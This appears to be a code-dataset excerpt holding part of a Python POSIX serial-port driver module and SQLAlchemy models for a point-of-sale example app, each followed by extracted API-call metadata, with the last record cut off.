#_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. # try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. This may throw a SerialException if the port cannot be opened.""" self.fd = None if self._port is None: raise SerialException("Port must be configured before it can be used.") # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except Exception as msg: self.fd = None raise SerialException("could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True #~ self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd) except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() while len(read) < size: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. raise SerialException('device reports readiness to read but returned no data (device disconnected?)') read.extend(buf) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if self.fd is None: raise portNotOpenError t = len(data) d = data if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while t > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError d = d[n:] t = t - n except OSError as v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if self.fd is None: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def drainOutput(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """For easier use of the serial port instance with select. WARNING: this function is not portable to different platforms!""" if self.fd is None: raise portNotOpenError return self.fd def flowControl(self, enable): """manually control flow - when hardware or software flow control is enabled""" if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
[((32, 7, 32, 27), 'sys.platform.lower', 'sys.platform.lower', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((252, 17, 252, 36), 'struct.pack', 'struct.pack', ({(252, 29, 252, 32): '"""I"""', (252, 34, 252, 35): '0'}, {}), "('I', 0)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((253, 16, 253, 43), 'struct.pack', 'struct.pack', ({(253, 28, 253, 31): '"""I"""', (253, 33, 253, 42): 'TIOCM_RTS'}, {}), "('I', TIOCM_RTS)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((254, 16, 254, 43), 'struct.pack', 'struct.pack', ({(254, 28, 254, 31): '"""I"""', (254, 33, 254, 42): 'TIOCM_DTR'}, {}), "('I', TIOCM_DTR)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((44, 14, 44, 40), 'array.array', 'array.array', ({(44, 26, 44, 29): '"""i"""', (44, 31, 44, 39): '[0] * 32'}, {}), "('i', [0] * 32)", False, 'import array, fcntl\n'), ((47, 8, 47, 54), 'FCNTL.ioctl', 'FCNTL.ioctl', ({(47, 20, 47, 27): 'port.fd', (47, 29, 47, 48): 'TERMIOS.TIOCGSERIAL', (47, 50, 47, 53): 'buf'}, {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)', False, 'import FCNTL\n'), ((409, 8, 409, 101), 'termios.tcsetattr', 'termios.tcsetattr', ({(409, 26, 409, 33): 'self.fd', (409, 35, 409, 50): 'TERMIOS.TCSANOW', (409, 52, 409, 100): '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'}, {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\n ispeed, ospeed, cc])', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((431, 12, 431, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(431, 24, 431, 31): 'self.fd', (431, 33, 431, 40): 'TIOCINQ', (431, 42, 431, 56): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCINQ, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((497, 8, 497, 50), 'termios.tcflush', 'termios.tcflush', ({(497, 24, 497, 31): 'self.fd', (497, 33, 497, 49): 'TERMIOS.TCIFLUSH'}, {}), '(self.fd, TERMIOS.TCIFLUSH)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((504, 8, 504, 50), 'termios.tcflush', 'termios.tcflush', ({(504, 24, 504, 31): 'self.fd', (504, 33, 504, 49): 'TERMIOS.TCOFLUSH'}, {}), '(self.fd, TERMIOS.TCOFLUSH)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((539, 12, 539, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(539, 24, 539, 31): 'self.fd', (539, 33, 539, 41): 'TIOCMGET', (539, 43, 539, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((545, 12, 545, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(545, 24, 545, 31): 'self.fd', (545, 33, 545, 41): 'TIOCMGET', (545, 43, 545, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((551, 12, 551, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(551, 24, 551, 31): 'self.fd', (551, 33, 551, 41): 'TIOCMGET', (551, 43, 551, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((557, 12, 557, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(557, 24, 557, 31): 'self.fd', (557, 33, 557, 41): 'TIOCMGET', (557, 43, 557, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((565, 8, 565, 32), 'termios.tcdrain', 'termios.tcdrain', ({(565, 24, 565, 31): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((571, 8, 571, 58), 'fcntl.fcntl', 'fcntl.fcntl', ({(571, 20, 571, 27): 'self.fd', (571, 29, 571, 42): 'FCNTL.F_SETFL', (571, 44, 571, 57): 'os.O_NONBLOCK'}, {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)', False, 'import array, fcntl\n'), ((613, 15, 613, 28), 'select.poll', 'select.poll', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((58, 18, 58, 64), 'FCNTL.ioctl', 'FCNTL.ioctl', ({(58, 30, 58, 37): 'port.fd', (58, 39, 58, 58): 'TERMIOS.TIOCSSERIAL', (58, 60, 58, 63): 'buf'}, {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)', False, 'import FCNTL\n'), ((273, 22, 273, 80), 'os.open', 'os.open', ({(273, 30, 273, 42): 'self.portstr', (273, 44, 273, 79): 'os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK'}, {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((306, 61, 306, 87), 'termios.tcgetattr', 'termios.tcgetattr', ({(306, 79, 306, 86): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((432, 15, 432, 35), 'struct.unpack', 'struct.unpack', ({(432, 29, 432, 32): '"""I"""', (432, 33, 432, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((442, 24, 442, 69), 'select.select', 'select.select', ({(442, 38, 442, 47): '[self.fd]', (442, 48, 442, 50): '[]', (442, 51, 442, 53): '[]', (442, 55, 442, 68): 'self._timeout'}, {}), '([self.fd], [], [], self._timeout)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((516, 12, 516, 42), 'fcntl.ioctl', 'fcntl.ioctl', ({(516, 24, 516, 31): 'self.fd', (516, 33, 516, 41): 'TIOCSBRK'}, {}), '(self.fd, TIOCSBRK)', False, 'import array, fcntl\n'), ((518, 12, 518, 42), 'fcntl.ioctl', 'fcntl.ioctl', ({(518, 24, 518, 31): 'self.fd', (518, 33, 518, 41): 'TIOCCBRK'}, {}), '(self.fd, TIOCCBRK)', False, 'import array, fcntl\n'), ((524, 12, 524, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(524, 24, 524, 31): 'self.fd', (524, 33, 524, 41): 'TIOCMBIS', (524, 43, 524, 56): 'TIOCM_RTS_str'}, {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)', False, 'import array, fcntl\n'), ((526, 12, 526, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(526, 24, 526, 31): 'self.fd', (526, 33, 526, 41): 'TIOCMBIC', (526, 43, 526, 56): 'TIOCM_RTS_str'}, {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)', False, 'import array, fcntl\n'), ((532, 12, 532, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(532, 24, 532, 31): 'self.fd', (532, 33, 532, 41): 'TIOCMBIS', (532, 43, 532, 56): 'TIOCM_DTR_str'}, {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)', False, 'import array, fcntl\n'), ((534, 12, 534, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(534, 24, 534, 31): 'self.fd', (534, 33, 534, 41): 'TIOCMBIC', (534, 43, 534, 56): 'TIOCM_DTR_str'}, {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)', False, 'import array, fcntl\n'), ((583, 12, 583, 50), 'termios.tcflow', 'termios.tcflow', ({(583, 27, 583, 34): 'self.fd', (583, 36, 583, 49): 'TERMIOS.TCION'}, {}), '(self.fd, TERMIOS.TCION)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((585, 12, 585, 51), 'termios.tcflow', 'termios.tcflow', ({(585, 27, 585, 34): 'self.fd', (585, 36, 585, 50): 'TERMIOS.TCIOFF'}, {}), '(self.fd, TERMIOS.TCIOFF)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((419, 16, 419, 33), 'os.close', 'os.close', ({(419, 25, 419, 32): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((466, 22, 466, 33), 'time.time', 'time.time', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((471, 20, 471, 40), 'os.write', 'os.write', ({(471, 29, 471, 36): 'self.fd', (471, 38, 471, 39): 'd'}, {}), '(self.fd, d)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((283, 16, 283, 33), 'os.close', 'os.close', ({(283, 25, 283, 32): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((478, 34, 478, 76), 'select.select', 'select.select', ({(478, 48, 478, 50): '[]', (478, 52, 478, 61): '[self.fd]', (478, 63, 478, 65): '[]', (478, 67, 478, 75): 'timeleft'}, {}), '([], [self.fd], [], timeleft)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((540, 15, 540, 35), 'struct.unpack', 'struct.unpack', ({(540, 29, 540, 32): '"""I"""', (540, 33, 540, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((546, 15, 546, 35), 'struct.unpack', 'struct.unpack', ({(546, 29, 546, 32): '"""I"""', (546, 33, 546, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((552, 15, 552, 35), 'struct.unpack', 'struct.unpack', ({(552, 29, 552, 32): '"""I"""', (552, 33, 552, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((558, 15, 558, 35), 'struct.unpack', 'struct.unpack', ({(558, 29, 558, 32): '"""I"""', (558, 33, 558, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((475, 41, 475, 52), 'time.time', 'time.time', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((136, 18, 136, 46), 'array.array', 'array.array', ({(136, 30, 136, 33): '"""i"""', (136, 35, 136, 45): '[baudrate]'}, {}), "('i', [baudrate])", False, 'import array, fcntl\n'), ((138, 12, 138, 53), 'fcntl.ioctl', 'fcntl.ioctl', ({(138, 24, 138, 31): 'port.fd', (138, 33, 138, 44): 'IOSSIOSPEED', (138, 46, 138, 49): 'buf', (138, 51, 138, 52): '(1)'}, {}), '(port.fd, IOSSIOSPEED, buf, 1)', False, 'import array, fcntl\n'), ((130, 14, 130, 24), 'os.uname', 'os.uname', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((201, 4, 214, 39), 'sys.stderr.write', 'sys.stderr.write', ({(201, 21, 214, 38): '("""don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))'}, {}), '(\n """don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n')]
electricimp/examples
Older Examples - enter at your own risk/lavender_pos/app/models.py
ebdd01baf64f3aa67f027194457432c7d7501d37
import datetime from database import Base from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) first_name = Column(String(255)) last_name = Column(String(255)) email = Column(String(255), index=True, unique=True) password = Column(String(255)) def get_id(self): """ Callback for Flask-Login. Represents that unique ID of a given user object. It is unicoded as per specification. Returns: the unique ID of an object """ return unicode(self.id) def is_anonymous(self): """ Callback for Flask-Login. Default to False - we don't deal with any anonymous users. Returns: False """ return False def is_active(self): """ Callback for Flask-Login. Default to True - we don't deal with non-active users. Returns: True """ return True def is_authenticated(self): """ Callback for Flask-Login. Should return True unless the object represents a user should not be authenticated. Returns: True because all objects should be authenticated """ return True class PendingTransaction(Base): __tablename__ = 'pending_transactions' id = Column(Integer, primary_key=True) barcode = Column(String(10)) user_id = Column(Integer, ForeignKey('users.id')) timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now()) # Status: 0 - default, 1 - scanned, 2 - claimed status = Column(Integer, default=0) company = Column(Integer, ForeignKey('vendors.id')) amount = Column(Float) class Transaction(Base): __tablename__ = 'transactions' id = Column(Integer, primary_key=True) user_id = Column(Integer, ForeignKey('users.id')) company = Column(Integer, ForeignKey('vendors.id')) amount = Column(Float) timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now()) class Vendor(Base): __tablename__ = 'vendors' id = Column(Integer, primary_key=True) name = Column(String(255)) agent_url = Column(String(255)) secret = Column(String(255))
[((9, 9, 9, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((55, 9, 55, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((60, 13, 60, 39), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((62, 13, 62, 26), 'sqlalchemy.Column', 'Column', ({(62, 20, 62, 25): 'Float'}, {}), '(Float)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((68, 9, 68, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((71, 13, 71, 26), 'sqlalchemy.Column', 'Column', ({(71, 20, 71, 25): 'Float'}, {}), '(Float)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((77, 9, 77, 42), 'sqlalchemy.Column', 'Column', (), '', False, 